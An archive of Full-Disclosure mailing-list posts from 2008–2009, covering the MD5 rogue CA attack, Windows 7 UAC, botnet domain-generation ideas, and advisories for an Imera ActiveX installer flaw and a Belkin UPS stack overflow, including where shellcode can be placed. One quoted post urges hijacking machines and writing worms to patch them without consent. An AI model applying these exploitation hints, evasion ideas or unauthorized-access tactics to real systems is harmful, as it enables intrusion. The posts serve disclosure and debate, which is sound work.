wpwEAQECAAYFAklaVFQACgkQi04xwClgpZh4TQP+ODe2/jTHhOrLbKtoSJhZInX+lJXt
LMkU/xlYK1Au/f1E5KhXt43uMWYSeC/M0njQRPLyrDfihFlLsmAxGK/97kRQfxEttbcN
R0q1BL+WmbiGNglujzSWHqMSkn20r12itVfGP77nEbGYbjidV1BXxFNR2QQwLHZhGLWe
gVO/5Zg=
=+Pm+
-END PGP SIGNATURE-

--
Click for free info on getting an MBA, $200K/ year potential.
 
http://tagline.hushmail.com/fc/PnY6qxsZwUN6299xt0fJO8HvJUKovV4hcZ7MH3I6KbhlC0IDsYiG8/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Creating a rogue CA certificate

2008-12-30 Thread Elazar Broad

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

I am waiting for RapidSSL's reaction, then again, $12 certs, you
get what you pay for...

On Tue, 30 Dec 2008 14:02:11 -0500 James Matthews
 wrote:
>This is going to be fun for all e-commerce sites etc
>
>On Tue, Dec 30, 2008 at 7:03 PM, Elazar Broad
> wrote:
>
>> -BEGIN PGP SIGNED MESSAGE-
>> Hash: SHA1
>>
>> SSL/PKI is only as strong as the weakest CA...
>>
>> For those of you who haven't been following this, here you go:
>>
>> http://www.win.tue.nl/hashclash/rogue-ca/
>> http://www.phreedom.org/research/rogue-ca/md5-collisions-1.0.ppt
>>
>> Enjoy and Happy New Years!
>>
>> elazar
>> -BEGIN PGP SIGNATURE-
>> Charset: UTF8
>> Version: Hush 3.0
>> Note: This signature can be verified at
>https://www.hushtools.com/verify
>>
>>
>wpwEAQECAAYFAklaVFQACgkQi04xwClgpZh4TQP+ODe2/jTHhOrLbKtoSJhZInX+lJX
>t
>>
>LMkU/xlYK1Au/f1E5KhXt43uMWYSeC/M0njQRPLyrDfihFlLsmAxGK/97kRQfxEttbc
>N
>>
>R0q1BL+WmbiGNglujzSWHqMSkn20r12itVfGP77nEbGYbjidV1BXxFNR2QQwLHZhGLW
>e
>> gVO/5Zg=
>> =+Pm+
>> -END PGP SIGNATURE-
>>
>> --
>> Click for free info on getting an MBA, $200K/ year potential.
>>
>>
>http://tagline.hushmail.com/fc/PnY6qxsZwUN6299xt0fJO8HvJUKovV4hcZ7M
>H3I6KbhlC0IDsYiG8/
>>
>> ___
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>
>
>
>--
>http://www.astorandblack.com/
-BEGIN PGP SIGNATURE-
Charset: UTF8
Version: Hush 3.0
Note: This signature can be verified at https://www.hushtools.com/verify

wpwEAQECAAYFAklaeAcACgkQi04xwClgpZi8SQP+Put2ha0l10GRJEjOmUdYX/mjeHLz
GDWgy4kXp3SvxIyDr+xrDNGVYsZ8NjFGtcycbgn/a2ncWbulBzazIfJAqzyjcpx+uKRK
LK2M5tDNcFGT3jpm+bc17/98y7mz4ITgj1KUnmZt+tLOfCCbj1pFlbCN2k3EU+qg6/vH
lM4LM+w=
=xzmw
-END PGP SIGNATURE-

--
Free Download for Outlook Users
Faster Outlook Search. Try this Free Download 
 
http://tagline.hushmail.com/fc/u4MuRdD6BtYsWSnscq5VAvVU82uG1NOq7MHO9miv3FQtcIDqeIWSE/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Creating a rogue CA certificate

2008-12-30 Thread Elazar Broad

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

And they should have listened then, it was only a matter of time
before someone fleshed out a practical attack, and that time is
now. Then again, I am sure there some ATM's out there still using
DES. How many time's do we need to prove Moore's law...

On Tue, 30 Dec 2008 15:26:46 -0500 Nelson Murilo
 wrote:
>Implementation could be new, but this vulnerabillity is knew since
>2004,
>the year that md5 was broken.
>
>http://www.cryptography.com/cnews/hash.html
>
>./nelson -murilo
>
>
>On Tue, Dec 30, 2008 at 08:10:16PM +, n3td3v wrote:
>> Aiding script kids to get credit card numbers out of folks e-
>commerce
>> purchases. I'm sure the U.S secret service have a special
>interest in
>> this vulnerability, as so much of their time nowadays is taken
>up
>> following up on internet carders and shutting them down.
>>
>> On Tue, Dec 30, 2008 at 5:03 PM, Elazar Broad
> wrote:
>> > -BEGIN PGP SIGNED MESSAGE-
>> > Hash: SHA1
>> >
>> > SSL/PKI is only as strong as the weakest CA...
>> >
>> > For those of you who haven't been following this, here you go:
>> >
>> > http://www.win.tue.nl/hashclash/rogue-ca/
>> > http://www.phreedom.org/research/rogue-ca/md5-collisions-
>1.0.ppt
>
>___
>Full-Disclosure - We believe in it.
>Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>Hosted and sponsored by Secunia - http://secunia.com/
-BEGIN PGP SIGNATURE-
Charset: UTF8
Note: This signature can be verified at https://www.hushtools.com/verify
Version: Hush 3.0

wpwEAQECAAYFAklajuMACgkQi04xwClgpZjS4QP7Beyc04b+CoGgpDWS7ojdnPMdI8Ty
XhEWqZxa5mVyy+uAFIXxc5I/J1BtsZKJPhV+mlIW9zWgUJASvn0LrLKGzzt+Bhlb3rYW
pGiL8UlmBOCf99qYBRF69vevSdA3gdu/JebXIWu33nPB7qZho6SSHYCwF7u5TJILgtI3
aiL33GQ=
=C7PQ
-END PGP SIGNATURE-

--
Click to become a master chef, own a restaurant and make millions.
 
http://tagline.hushmail.com/fc/PnY6qxtWo9fln3EqgOtev3Xt2UqYrdnKRqkHGIlsPHfICpCCcCO6k/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Creating a rogue CA certificate

2008-12-31 Thread Elazar Broad

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

That's true, keeping up with security is not cheap nor easy.
Tradeoff's are tradeoff's, the question is, when it comes down to
the $$$, is more cost effective to be proactive vs reactive in this
case. Time will tell...

On Tue, 30 Dec 2008 16:42:47 -0500 valdis.kletni...@vt.edu wrote:
>On Tue, 30 Dec 2008 16:13:07 EST, Elazar Broad said:
>> And they should have listened then, it was only a matter of time
>> before someone fleshed out a practical attack, and that time is
>> now. Then again, I am sure there some ATM's out there still
>using
>> DES. How many time's do we need to prove Moore's law...
>
>Playing devil's advocate for a moment...
>
>And perhaps they *were* listening, but realized that security is
>about
>tradeoffs, and they balanced the cost of doing the upgrade back
>then
>against the chances that a team as technically and budget-wise
>prepared
>as this one, *and with nefarious intent*, would do something
>significantly
>drastic enough to dent their revenue stream.
>
>Read section 5.2 of the hashclash/rogue-ca paper.  The victim CA
>is churning
>out an average of 1,000 certs in 3 days, let's say at $12 per.
>That's some
>$600K per year for just the weekends, not counting the Mon-Thurs
>span which
>is probably even higher (and why they targeted a weekend).  So $2M
>per year
>or more.
>
>Who wants to place a bet that said CA will be selling *the same
>number*
>of certs every week, meaning they had *no* economic loss due to
>this hack,
>because their customers won't actually *see* the news article and
>give them
>a bad feeling about their CA?  And with no actual loss, why spend
>the money
>to implement the change?
>
>Hint: It *isn't* just a matter of changing one line in a script to
>say
>'sha1' instead of 'md5' - you *also* need to go back and look at
>all the
>certs you've issued already and figure out if they've been
>tweaked...
-BEGIN PGP SIGNATURE-
Charset: UTF8
Version: Hush 3.0
Note: This signature can be verified at https://www.hushtools.com/verify

wpwEAQECAAYFAklbsqAACgkQi04xwClgpZh3FQQAgHyAry+xv7AOcUWHLNrGsUqmT9XP
BWa4ahzXUE9JTe8FT37fvNhv5ZwouHVYVZPZViwXcu0Kv2SHUSlfp5XGzObx6nDoO6X6
ObF8iBEPORsEkc9kzZDyOylswHRQrNI6c21t9GsntW0Nr8258ttY4xbhKmF0a+TkOWhX
/KBLZ4s=
=dMtL
-END PGP SIGNATURE-

--
Go to massage therapy school and make up to $150/hour, click now!
 
http://tagline.hushmail.com/fc/PnY6qxsbdbDEzAmhq24lIfo9SlWI9FpadA4MjMGNNyIfje7zdJ85y/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Creating a rogue CA certificate

2008-12-31 Thread Elazar Broad

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1


is more cost effective


should have been is *it

On Wed, 31 Dec 2008 12:57:52 -0500 Elazar Broad
 wrote:
>That's true, keeping up with security is not cheap nor easy.
>Tradeoff's are tradeoff's, the question is, when it comes down to
>the $$$, is more cost effective to be proactive vs reactive in
>this
>case. Time will tell...
>
>On Tue, 30 Dec 2008 16:42:47 -0500 valdis.kletni...@vt.edu wrote:
>>On Tue, 30 Dec 2008 16:13:07 EST, Elazar Broad said:
>>> And they should have listened then, it was only a matter of
>time
>>> before someone fleshed out a practical attack, and that time is
>>> now. Then again, I am sure there some ATM's out there still
>>using
>>> DES. How many time's do we need to prove Moore's law...
>>
>>Playing devil's advocate for a moment...
>>
>>And perhaps they *were* listening, but realized that security is
>>about
>>tradeoffs, and they balanced the cost of doing the upgrade back
>>then
>>against the chances that a team as technically and budget-wise
>>prepared
>>as this one, *and with nefarious intent*, would do something
>>significantly
>>drastic enough to dent their revenue stream.
>>
>>Read section 5.2 of the hashclash/rogue-ca paper.  The victim CA
>>is churning
>>out an average of 1,000 certs in 3 days, let's say at $12 per.
>>That's some
>>$600K per year for just the weekends, not counting the Mon-Thurs
>>span which
>>is probably even higher (and why they targeted a weekend).  So
>$2M
>>per year
>>or more.
>>
>>Who wants to place a bet that said CA will be selling *the same
>>number*
>>of certs every week, meaning they had *no* economic loss due to
>>this hack,
>>because their customers won't actually *see* the news article and
>>give them
>>a bad feeling about their CA?  And with no actual loss, why spend
>>the money
>>to implement the change?
>>
>>Hint: It *isn't* just a matter of changing one line in a script
>to
>>say
>>'sha1' instead of 'md5' - you *also* need to go back and look at
>>all the
>>certs you've issued already and figure out if they've been
>>tweaked...
-BEGIN PGP SIGNATURE-
Charset: UTF8
Version: Hush 3.0
Note: This signature can be verified at https://www.hushtools.com/verify

wpwEAQECAAYFAklbtS0ACgkQi04xwClgpZjT2QP/bIcnzHFZ35GMhXf1W+nptPJWHQ3W
zGejCeCWAKMGpPSy/aPP3AkMDgxxJNBduPyelS35gfYvu0oiBSbThQ0fOYMHUngJhuex
sydNqPhxYhKTfMEcOQLLU1x51Qr73wHyLHIlOcQh6fd0ZceTmOdd3ml9qp59Sq1JXTxr
Qo8J9Hg=
=Xxk2
-END PGP SIGNATURE-

--
Lower rates for Veterans. Click for VA loan information.
 
http://tagline.hushmail.com/fc/PnY6qxtVmScGZLWiBqwqAGkauzQUd9lMK0RPfsKCNYRb5o8OmdO9i/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] e-Holocaust

2009-01-23 Thread Elazar Broad

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

And you can probably find a majority of those 72 listed here
http://www.nsopw.gov...



On Fri, 23 Jan 2009 10:24:12 -0500 Miller Grey
 wrote:
>...hehe...
>
>On Mon, Jan 12, 2009 at 7:50 PM,  wrote:
>
>> On Mon, 12 Jan 2009 09:41:19 PST, Rants nRaves said:
>>
>> > Thank you for explaining it to me- it's so much clearer now.
>Based on
>> this
>> > new information, I take it your local religious leader told
>you hacking
>> some
>> > pointless websites and looking like an idiot in front of
>thousands of
>> people
>> > on full-disclosure wasn't worth even a single virgin in heaven
>then?
>>
>> Actually, they get 'friended' by 72 Myspace virgins, none of
>which look
>> anything like their picture.
>>
>> ___
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
-BEGIN PGP SIGNATURE-
Charset: UTF8
Version: Hush 3.0
Note: This signature can be verified at https://www.hushtools.com/verify

wpwEAQECAAYFAkl5+FAACgkQi04xwClgpZjSJwP/aNzEt1koK/dcpKux3k5mDCY/mCh8
Y/cMcfHrzYs/uJhQJPo84iHoDm20JQYRjRD+MlBYK7p9vuaooP4egbbLaCN1Y2P5G5Do
cQ756uAFs5EOZNufY5JkCbzhT9lA0Y/NZo8LUhkMI9ixISyXiagnxl3opf0+9zygBiwW
I4kNKDc=
=QfXb
-END PGP SIGNATURE-

--
Easy-to-use, advanced features, flexible phone systems.  Click here for more 
info.
 
http://tagline.hushmail.com/fc/PnY6qxu9tWpz2Gw9vfOhfJ1qDAdfk5uFrri2fdb1Nkrv5kA20VsV6/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Windows 7 UAC compromised

2009-02-06 Thread Elazar Broad

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Exactly, so we only make him click for non system
applets/utilities, and we determine that by digital signatures,
which is exactly how UAC is implemented in Windows 7. With that
said, now we are back to the original issue, a computer is only as
smart(or dumb, my apologies to the AI crowd) as the guy who
programmed it, or in other words, how hard(or easy) is it to spoof
a system applet/utility?

Human nature dictates(most of the time) that we can become
desensitized to things that are routine or occur often, in other
words, the more UAC prompts, the more blind clicking, then again,
did Joe Sixpack bother to read the first UAC prompt when he started
up his shiny new Vista for the 1st time.

Now, if we wired UAC up to a mouse with an electrode embedded in
the left mouse button, we might have a solution. Of course the
voltage would need to increase slightly over the life of the mouse
in order to solve the blind shock and click problem...

elazar

On Fri, 06 Feb 2009 05:57:03 -0500 Yudi Rosen
 wrote:
>But Joe the Plumber doesn't want to have to click on endless
>'confirm'
>dialogs every time he tries to use the computer. Simply having him
>run as a
>non-admin user only fixes half the problem.
>
>On Thu, Feb 5, 2009 at 9:17 PM, Jimmy Astle 
>wrote:
>
>> I am new to the list so hello to everyone.
>>
>> Now for the Windows 7 UAC stuff.
>>
>> 1.) Its beta its not going to be perfect wait for RC1 before
>selling 7
>> down the river.
>> 2.)
>> http://www.informationweek.com/news/security/app-
>security/showArticle.jhtml?articleID=213001021&subSection=News
>>
>>It all comes back to windows biggest issue, joe
>the plumber
>> shouldn't not be running as a local admin on his box. UAC
>problem solved!  I
>> still dont see how redmond missed the concept.
>>
>>
>>
>>
>> On Thu, Feb 5, 2009 at 1:52 PM, Miller Grey
>wrote:
>>
>>> ...what?
>>>
>>> On Tue, Feb 3, 2009 at 3:40 PM, M.B.Jr.
> wrote:
>>>
 Windows says: Hello world! Check this out, world, this is
>really cool.
 Now I have, uh, something like, uh, "privileges management"!



 "UAC" is no more than a new commercial designation for
>something with
 about 40 years.
 And they (Redmond) are still missing the concept's point.






 On Mon, Feb 2, 2009 at 5:14 PM, Christopher Pritchard
  wrote:
 >> The biggest issue here is that although it's technically
>easy to fix
 >> this problem (just have UAC issue an alert when somebody's
>messing
 with
 >> the system settings), it involves doing more of what end
>users dislike
 >> most about UAC (it issuing alerts to Joe Sixpack all the
>time when he
 >> does something bone-headed security-wise).
 >>
 >> Fixing this one in a way that users will put up with will
>be a bitch.
 >
 > Why not just have it not prompt if you are changing
>settings, except
 for UAC settings? that would be the simple way around it
 >
 > ___
 > Full-Disclosure - We believe in it.
 > Charter: http://lists.grok.org.uk/full-disclosure-
>charter.html
 > Hosted and sponsored by Secunia - http://secunia.com/
 >



 --
 Marcio Barbado, Jr.

 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/

>>>
>>>
>>> ___
>>> Full-Disclosure - We believe in it.
>>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>>> Hosted and sponsored by Secunia - http://secunia.com/
>>>
>>
>>
>> ___
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
-BEGIN PGP SIGNATURE-
Charset: UTF8
Note: This signature can be verified at https://www.hushtools.com/verify
Version: Hush 3.0

wpwEAQECAAYFAkmMTvUACgkQi04xwClgpZib+AP9F9nse7R1YZxa1t5lfhxt7ifdsJ2g
AQqj8gU3WRA2jFirU8uSCr0gNms7thdGUr9E47k8Rex2oglcuaThA/UM2CV0q+WRWyRN
l9ufwQu8HhndZA/aNqjdWbubXRRUFB8x0utY2lKFdbFiiqvk7ogztZ96DzK1Ujhf/HKC
IGp3Dlg=
=OLph
-END PGP SIGNATURE-

--
Love Graphic Design? Find a school near you. Click Now.
 
http://tagline.hushmail.com/fc/PnY6qxunKhUCWeXBZzoDmEq2Rrpr2dhlILwZbiXAUOMw578dWAklS/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Windows 7 UAC compromised

2009-02-06 Thread Elazar Broad

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1


I maintain that by not educating our users we are failing in that
goal.


With many it is in one ear, out the other, unless you are allowed
to use a clue bat...

On Fri, 06 Feb 2009 09:36:32 -0500 Kevin Wilcox
 wrote:
>2009/2/6 Yudi Rosen :
>
>> But Joe the Plumber doesn't want to have to click on endless
>'confirm'
>> dialogs every time he tries to use the computer. Simply having
>him run as a
>> non-admin user only fixes half the problem.
>
>No, it doesn't fix anywhere *near* half of the problem; it doesn't
>address that we have millions of people that use their computers
>without knowing anything about them.
>
>"But not every car driver needs to be a mechanic!" Yes, I know
>this,
>but every driver needs to know that there are laws and rules
>concerning how they drive and what happens when a 1200 kilogramme
>car
>hits a 100 kilogramme pedestrian at 70 kilometres/hour. Every
>driver
>needs to know they need to have their tyres rotated and their oil
>changed. There are things you must know beyond, "accelerator,
>decelerator and steering wheel".
>
>"But a computer isn't going to kill anyone if someone gets
>infected by
>a virus or trojan!" Yes, I know this, too, but if you're mixing
>questionable software and surfing habits with online banking and
>shopping, it's a recipe for destruction. Welcome to identity theft
>and
>empty bank accounts.
>
>We can either continue to pretend like it's *only* really crappy
>software or we can realise that it's a combination of easily
>exploitable software, user ignorance and user apathy. You can give
>them an operating system that has been vetted and been through
>multiple code reviews by people that really do know secure OS
>design
>but they wouldn't be able to accomplish anything at all. So what
>do we
>do? We give them operating systems that are less secure, hope they
>don't shoot their feet off and turn them loose with it - but we
>don't
>shoulder the burden of training them. Some of us do but we, as a
>collective, do not. Until we can properly educate our users, all
>we
>are doing is trying to mitigate risk in the best ways we can while
>still providing them a service. I maintain that by not educating
>our
>users we are failing in that goal.
>
>kmw
>
>--
>Far better is it to dare mighty things, to win glorious triumphs,
>even
>if chequered by failure, than to take rank with those poor spirits
>who
>neither enjoy much nor suffer much, because they live in the grey
>twilight that knows not victory or defeat.
>
>___
>Full-Disclosure - We believe in it.
>Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>Hosted and sponsored by Secunia - http://secunia.com/
-BEGIN PGP SIGNATURE-
Charset: UTF8
Version: Hush 3.0
Note: This signature can be verified at https://www.hushtools.com/verify

wpwEAQECAAYFAkmMT1gACgkQi04xwClgpZgnUgP7B0HbM0CEvXuhzgFmOuCe78TAbNsu
sbc4JuWZU7sY6AqL7gHlg7MP4x6z3j49DWYtpHOHLvwThJeKzwxAthXnnaH0I6PT64Ki
5l2HO42hI+hmablEJKvqSdBCMJgk48UGONnFAPvVCuThr3yyIRpnIb9vjH5RDY093yOo
KMo1FTY=
=eAt7
-END PGP SIGNATURE-

--
Protect our community.  Click here to take criminal justice classes and begin a 
rewarding career.
 
http://tagline.hushmail.com/fc/PnY6qxtpLJCHFvjYoeYUQ4XsQaFkOvAGtlKkYBY2VxrXTypHIfN0k/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Oh Yeah, botnet communications

2009-02-19 Thread Elazar Broad

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

"You know how the current amateur botnet offerings are basing
domain lists off the current time to allow the 'good guys' to
prepare?"

Shhh, your gonna wake the " writes all the
malware" theorists...


On Thu, 19 Feb 2009 23:13:38 -0500 T Biehn  wrote:
>You know how the current amateur botnet offerings are basing
>domain lists
>off the current time to allow the 'good guys' to prepare?

>Why not base the seed off something like a news RSS feed? I asked
>some
>whitehats when I was ruined in Washington DC and they couldn't
>tell me.
>
>News isn't predictable but is globally shared on a given day.
>
>-Travis
-BEGIN PGP SIGNATURE-
Charset: UTF8
Note: This signature can be verified at https://www.hushtools.com/verify
Version: Hush 3.0

wpwEAQECAAYFAkmeNYoACgkQi04xwClgpZhjdAP/Uz4IUuJPRrNJbbuZW5zaSllvBUZM
I0MSZCD3KYViEWbDSzBWIYBY67DHTl2SAz5n91aG3Xswd+AYj//9uMVPSBg0OJ/DcXX1
FItea1gc6PPeNMLWAXMrLcbP2wCwzDlrzjzU4TRmUGUXQBSWq9E/RccqI2QvzpqvvBKu
Nfr1JeA=
=0Rjf
-END PGP SIGNATURE-

--
Earn your medical billing and coding degree, 100% online! Enroll now.
 
http://tagline.hushmail.com/fc/BLSrjkqfMmgJRBfXoys7dlGxe42aOzYO2gb37Tz3VOR2i51BEqQXYN67V8X/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Oh Yeah, botnet communications

2009-02-23 Thread Elazar Broad

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1


...stealthy infection is trickier.


but not impossible, checkout Symantec/F-Secure joint analysis of
mebroot: https://forums.symantec.com/t5/blogs/blogprintpage/blog-
id/malicious_code/article-
id/244;jsessionid=A4811540934368155A4B0BEE4D0B0615. Now that's
tricky...

On Mon, 23 Feb 2009 07:56:00 -0500 "John C. A. Bambenek, GCIH,
CISSP"  wrote:
>Yes, its possible, I mapped out something on a high level that
>would
>use rss/xml and would evade most detection methods on the
>network...
>Problem comes in is that stuff gets detected at infection-time and
>gets reverse engineered. Stealthy botnets is easy, stealthy
>infection
>is trickier.
>
>On 2/19/09, T Biehn  wrote:
>> God Valdis,
>> Dont concentrate on the mundane, the core issue is the
>unpredictable nature
>> of it.
>> You have them all coordinate reading the news at 12:00 AM GMT.
>> You build some silly algorithm that ensures they pick the right
>article.
>>
>> -Travis
>>
>> On Thu, Feb 19, 2009 at 11:34 PM, 
>wrote:
>>
>>> On Thu, 19 Feb 2009 23:13:38 EST, T Biehn said:
>>>
>>> > You know how the current amateur botnet offerings are basing
>domain
>>> > lists
>>> > off the current time to allow the 'good guys' to prepare?
>>> >
>>> > Why not base the seed off something like a news RSS feed? I
>asked some
>>> > whitehats when I was ruined in Washington DC and they
>couldn't tell me.
>>>
>>> If you're the botnet owner, you need to have some way to know
>what domain
>>> name your botnet will be looking for, so you can register it.
>>>
>>> If you look at 11:06AM, see the top news story is something
>about Obama
>>> flipping the Republican party the bird, and computes the domain
>name to
>>> register based on that, but then at 11:07AM some editor at CNN
>pulls that
>>> headline and replaces it with "Obama sends obscene gesture to
>Republicans"
>>> before your bots wake up at 11:08AM and check what domain to
>use, you're
>>> screwed.
>>>
>>>
>>>
>>
>
>--
>Sent from my mobile device
>
>___
>Full-Disclosure - We believe in it.
>Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>Hosted and sponsored by Secunia - http://secunia.com/
-BEGIN PGP SIGNATURE-
Charset: UTF8
Note: This signature can be verified at https://www.hushtools.com/verify
Version: Hush 3.0

wpwEAQECAAYFAkmi77AACgkQi04xwClgpZhpSAP/QaZAxqbMdtYnXr9wWeIA3LGW7HYS
W47lUExf8UJdLeqFOA3n+LanXZhdaqpeX6vxnVYoinMEaqD1GU4WDd7f8Kwp0oFHjEMY
x/oGaULnIbSp05SDIRdBo7lfl2iEiqzvrXTwGjc01sWRzLfTtjnb+Map/l+0+IanvkUh
7+PzOLQ=
=xUVb
-END PGP SIGNATURE-

--
Click here to save cash and find low rates on auto loans.
 
http://tagline.hushmail.com/fc/BLSrjkqhD124nV6YyCybw0EfnbPXFfMGwqpyMGkKED7rMOrsr1lVKA1kmA4/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Imera ImeraIEPlugin ActiveX Control Remote Code Execution

2009-03-03 Thread Elazar Broad

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Who:
 Imera(http://www.imera.com)
 Imera TeamLinks Client(http://teamlinks.imera.com/install.html)

What:
 ImeraIEPlugin.dll
 Version 1.0.2.54
 Dated 12/02/2008
 {75CC8584-86D4-4A50-B976-AA72618322C6}
 http://teamlinks.imera.com/ImeraIEPlugin.cab

How:
 This control is used to install the Imera TeamLinks Client
package. The control fails to validate the content that it is to
download and install is indeed the Imera TeamLinks Client software.

Exploiting this issue is quite simple, like so:








Fix:
 The vendor has been notified.

Workaround:
 Set the killbit for the affected control, see
http://support.microsoft.com/kb/240797.
Use the Java installer for TeamLinks Client or install the software
manually from: http://teamlinks.imera.com/download.html

Elazar
-BEGIN PGP SIGNATURE-
Charset: UTF8
Note: This signature can be verified at https://www.hushtools.com/verify
Version: Hush 3.0

wpwEAQECAAYFAkmtR6YACgkQi04xwClgpZgbTgP/T3l+Gj+pIt19H80tiHrlbpbB7+qh
/03/vQYTEL75n0XCmfGjbcurLhWlo+m90eDQwlgigq3CoQyqleKNI8kSDYjr2pw289Pm
qC21ASe/P3zIM+gt81+iqDtKMA/MGvOE20nrHVEWlatAlCgmSjt3MJhqEJ/GdzUiR22s
BDrpVM8=
=R0h3
-END PGP SIGNATURE-

--
Thinking of a life with religion?  Click here to find a religious school near 
you.
 
http://tagline.hushmail.com/fc/BLSrjkqkOt2ULsSphoguIMPooi9T2eJVBhBNEJeyTxDH8nsQ8r6djRRztwU/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Belkin BullDog Plus UPS-Service Buffer Overflow Vulnerability

2009-03-07 Thread Elazar Broad

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Who:
Belkin International, Inc.
http://www.belkin.com

What:
Belkin BullDog Plus UPS Management Software
v4.0.2 Build 1219

UPS-Service.exe
v1.0.0.1
dated 12/19/2006

How:
The UPS management software contains a built-in web server which
allows for remote management of the UPS. The management interface
is protected by a username and password. Authentication is
performed via Basic authentication.

There is a small stack-based overflow in the base64 decoding
routine which handled the Basic authentication data.

Caveats:
The web server is not enabled by default.

Exploit:
The size of the buffer is too small for shellcode, however, this
can be stored in the GET request, which sits at esp+0x58.

Fix:
I was unable to locate any security contact information for this
vendor, so I attempted to contact their support department, which
turned out to be waste of time.

Workaround:
As previously stated, the web server is not enabled by default.
If you do need to use it, use a firewall or OS port filtering
capabilities to restrict access.

Elazar
-BEGIN PGP SIGNATURE-
Charset: UTF8
Note: This signature can be verified at https://www.hushtools.com/verify
Version: Hush 3.0

wpwEAQECAAYFAkmzNkYACgkQi04xwClgpZiDbAP/TY+XD+L+LOXZ7XbFf5QL+t0UILhh
1dMv3Q565keOjTXbREbaS602KjZk5D1t2chPxvDCecjgCu5oghrTkmzYcG1cS+o8H9HP
CHw58Ckl0u8qwFX04knxD721YQGihoASrKIVQXPexV9xwW1LAfn/6qW3r8dKTopayjL3
039YSEM=
=BoqQ
-END PGP SIGNATURE-

--
Buy Hardwood Floors Direct - Click Here.

http://tagline.hushmail.com/fc/BLSrjkqfXT1MaBe0v5mHgjnSKBLLYBxkmGOXAgcWGLeKaTo4BJXSrKnZAoo/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] BBC cybercrime probe backfires

2009-03-13 Thread Elazar Broad

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

I am inclined to agree, except that you still have issues with the
electronic equivalent of breaking and entering. Case in point,
there is a good chance you would be arrested and prosecuted if you
opened the door to another persons dwelling which did not have a
lock installed, and installed a lock and left him/her the key,
simply because you entered their property without permission. From
a ethics perspective, most people would judge you a good Samaritan,
you helped someone else protect their property, however the law
doesn't see it that way, primarily because of the fact that, if you
don't have permission to be there, chances are you are not wanted
there, no matter what your intentions may be.

As far as hijacking bot nets, one who steals from a thief may be a
thief, but one who stops one in the act is a hero. Bot nets are
always "in the act"...

On Fri, 13 Mar 2009 14:00:47 -0400 T Biehn  wrote:
>More people should hijack machines and push updates to them if
>their
>users are unable or unwilling.
>
>First an Analogy:
>If someone's letting money launders use their bank account to
>launder
>money out of INACTION that's still illegal, the same SHOULD be
>true of
>people who leave their systems unpatched.
>
>These machines are negligently left open to be used in 'nefarious
>criminal activity.'
>
>Plan of Action:
>It's your civic duty to write worms, hijack botnets and patch
>machines
>with or without user consent.
>This is absolutely moral holding to the various tests (is it self
>defeating if -everyone- does it etc etc)
>Just don't get caught doing it.
>
>I'm disgusted by the imposition that you'd decry their actions for
>being illegal when they were clearly moral and represent a net
>benefit
>for society. Haven't you heard of this guy called Gandhi who
>didn't
>subscribe to the arbitrary superficial morality provided by the
>word
>of the law and only acted on what he knew to be moral?
>
>It's time to elevate yourself out of your own mind-slime and into
>2009.
>We all still have a long way to go.
>
>-Travis
>
>On Fri, Mar 13, 2009 at 9:00 AM, Castigliola, Angelo
> wrote:
>> Very unorthodox and unethical.
>>
>>
>>
>> Angelo Castigliola III
>> EISRM - Application Security Architecture
>>
>> Unum
>>
>> acastigli...@unum.com
>>
>>
>>
>> Disclaimer: The opinions expressed are my own personal opinions
>and do not
>> represent my employer's view in any way.
>>
